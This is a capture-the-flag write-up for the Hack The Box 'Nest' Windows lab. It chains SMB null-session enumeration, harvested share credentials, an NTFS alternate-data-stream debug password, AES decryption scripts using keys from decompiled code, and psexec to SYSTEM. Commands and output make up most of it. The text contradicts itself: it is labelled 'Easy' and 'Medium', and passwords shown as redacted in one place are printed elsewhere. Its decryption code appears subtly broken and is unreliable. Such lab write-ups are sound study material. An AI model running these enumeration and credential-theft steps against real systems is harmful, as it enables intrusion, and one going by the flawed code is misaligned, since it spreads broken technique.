Hack The Box · Lab

EasyWindowsPassword Attacks

Scope

10.10.10.178

NEST — HTB Write-up

Difficulty: Medium | OS: Windows | Category: Enumeration / Cryptography

Full Attack Chain

SMB null session → HR Welcome Email TempUser creds → NotepadPlusPlus config Secure$/IT/Carl path → VB project AES key → decrypt RU_config.xml c.smith hash → NTFS ADS debug password → HQK port 4386 DEBUG → navigate to HQK config → encrypted admin password → compile HqkLdap.exe → decrypt Administrator password → psexec SYSTEM

1. Reconnaissance

Why: Identify available services — Nest is a non-AD Windows box with only SMB and a custom reporting service exposed.

nmap -sC -sV -p- --min-rate 10000 -oA nmap/nest 10.10.10.178

Key findings: Port 445 (SMB) and port 4386 (HQK Reporting Service V1.2). No HTTP, no RDP, no WinRM. Domain: HTB-NEST.

PORT     STATE SERVICE
445/tcp  open  microsoft-ds?
4386/tcp open  HQK Reporting Service V1.2
  AVAILABLE COMMANDS: LIST, SETDIR, RUNQUERY, DEBUG, HELP

2. SMB Null Session — Data Share Spidering

Why: SMB allows read access to the Data share without credentials. Recursive spidering finds embedded credentials in IT config files.

# Anonymous access
crackmapexec smb 10.10.10.178 --shares
smbclient -N //10.10.10.178/Data

# Spider full share
crackmapexec smb 10.10.10.178 -u '' -p '' -M spider_plus --share Data

Key finding: Data/Shared/Templates/HR/Welcome Email.txt

Username: TempUser
Password: welcome2019

3. SMB as TempUser — Extended Enumeration

Why: TempUser credentials expose additional files in the Data/IT tree and the Secure$ share.

crackmapexec smb 10.10.10.178 -u 'TempUser' -p 'welcome2019' --shares
crackmapexec smb 10.10.10.178 -u 'TempUser' -p 'welcome2019' -M spider_plus

Key find #1 — RU Scanner config with encrypted password:

<!-- Data/IT/Configs/RU Scanner/RU_config.xml -->
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>

Key find #2 — NotepadPlusPlus recently opened files:

<!-- Data/IT/Configs/NotepadPlusPlus/config.xml -->
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />

Key finding: Carl's working directory is at Secure$\IT\Carl. Even though Secure$\IT is inaccessible, direct path traversal to Secure$\IT\Carl succeeds.

4. Secure$ Share — VB Source Code

Why: Traversing directly into Secure$\IT\Carl\VB Projects reveals Visual Basic source code for the RU Scanner application, containing the AES encryption key used to protect passwords in config files.

smbclient //10.10.10.178/Secure$ -U 'TempUser%<REDACTED>'
smb: \> cd IT\Carl\VB Projects\WIP\RU
smb: \WIP\RU\> ls
  RU Scanner.sln
  RU Scanner\Module1.vb
  RU Scanner\Utils.vb

Utils.vb — AES key and IV:

Public Const AES_KEY As String = "N3st22"
Public Const AES_IV As String  = "88552299"

5. Decrypt c.smith Password

Why: With the AES key and IV from the VB source, decrypt the base64 ciphertext from RU_config.xml.

import base64
from Crypto.Cipher import AES

key = b'N3st22'
iv  = b'88552299'

# Pad key to 16 bytes (AES-128)
key = key.ljust(16, b'\x00')
iv  = iv.ljust(16, b'\x00')

ct = base64.b64decode('fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=')
cipher = AES.new(key, AES.MODE_CBC, iv)
print(cipher.decrypt(ct).rstrip(b'\x00').decode())

Output: xRxRxPANCAK3SxRxRx

c.smith:<REDACTED>

6. SMB as c.smith — NTFS Alternate Data Stream

Why: c.smith has access to the Users/C.Smith share which contains the HQK Reporting directory. A critical file uses an NTFS Alternate Data Stream to hide the debug password.

smbclient //10.10.10.178/Users -U 'C.Smith%<REDACTED>'
smb: \> cd C.Smith\HQK\ Reporting\
smb: \> allinfo "Debug Mode Password.txt"

Output:

stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

# Download ADS content
smb: \> get "Debug Mode Password.txt:Password"
$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w

Also retrieved:

smb: \> get HQK_Config_Backup.xml

<HQKConfig>
  <Domain>nest.local</Domain>
  <Port>389</Port>
  <User>Administrator</User>
  <Password>yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=</Password>
</HQKConfig>

7. HQK Service — DEBUG Mode

Why: Port 4386 runs the proprietary HQK Reporting Service. The DEBUG command (using the password from the ADS) elevates to administrator mode, allowing filesystem traversal.

telnet 10.10.10.178 4386

HQK Reporting Service V1.2
> DEBUG WBQ201953D8w
Debug mode enabled. Use HELP to view available commands

> SETDIR \Users\C.Smith\HQK Reporting\AD Integration Module
> LIST
LDAPCrypto.dll
HqkLdap.exe

> RUNQUERY 1

Key finding: HqkLdap.exe and LDAPCrypto.dll are the LDAP integration module. The encrypted admin password in HQK_Config_Backup.xml uses the same encryption scheme — but with a different key embedded in HqkLdap.exe.

8. Reverse HqkLdap.exe — Decrypt Administrator Password

Why: The Administrator password in HQK_Config_Backup.xml is AES-encrypted. The decryption key is hardcoded in HqkLdap.exe / LDAPCrypto.dll. Download and decompile to extract the key.

# Download via SMB
smbclient //10.10.10.178/Users -U 'C.Smith%<REDACTED>'
smb: \> cd "C.Smith\HQK Reporting\AD Integration Module"
smb: \> get HqkLdap.exe
smb: \> get LDAPCrypto.dll

# Decompile with dnSpy / ilspy
# Key found in HqkLdap source:
Public Const LDAP_KEY As String = "NeAr0n0uGainAlotOrW3T"
Public Const LDAP_IV  As String = "814=u(r94G=HS-u8"

import base64
from Crypto.Cipher import AES

key = b'NeAr0n0uGainAlotOrW3T'[:16]
iv  = b'814=u(r94G=HS-u8'[:16]

ct = base64.b64decode('yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=')
cipher = AES.new(key, AES.MODE_CBC, iv)
print(cipher.decrypt(ct).rstrip(b'\x00').decode())

Output: XtH4nkS4Pl4y1nGX

Administrator:<REDACTED>

9. PSExec — SYSTEM

Why: Administrator credentials grant full remote command execution via PSExec over SMB.

psexec.py administrator@10.10.10.178

Output:

C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop> type root.txt
<REDACTED>

Attack Chain Summary

SMB null session → Data/Shared/Templates/HR/Welcome Email.txt
        ↓
TempUser:<REDACTED>
        ↓
SMB Data/IT/Configs/RU Scanner/RU_config.xml → c.smith AES ciphertext
SMB Data/IT/Configs/NotepadPlusPlus/config.xml → Secure$/IT/Carl path hint
        ↓
Secure$/IT/Carl/VB Projects/RU Scanner/Utils.vb → AES_KEY=N3st22, AES_IV=88552299
        ↓
Decrypt ciphertext → c.smith:<REDACTED>
        ↓
SMB Users/C.Smith/HQK Reporting/Debug Mode Password.txt:Password (NTFS ADS)
        ↓
Debug password: WBQ201953D8w
        ↓
SMB Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml → Admin AES ciphertext
        ↓
HQK port 4386 → DEBUG WBQ201953D8w → download HqkLdap.exe
        ↓
dnSpy decompile HqkLdap.exe → LDAP_KEY/LDAP_IV
        ↓
Decrypt admin ciphertext → Administrator:<REDACTED>
        ↓
psexec.py administrator@10.10.10.178 → SYSTEM → root.txt ✓

ⓒ 0xNRG

Logs

file

SMB_spidering_2025-07-29_10-15-38.log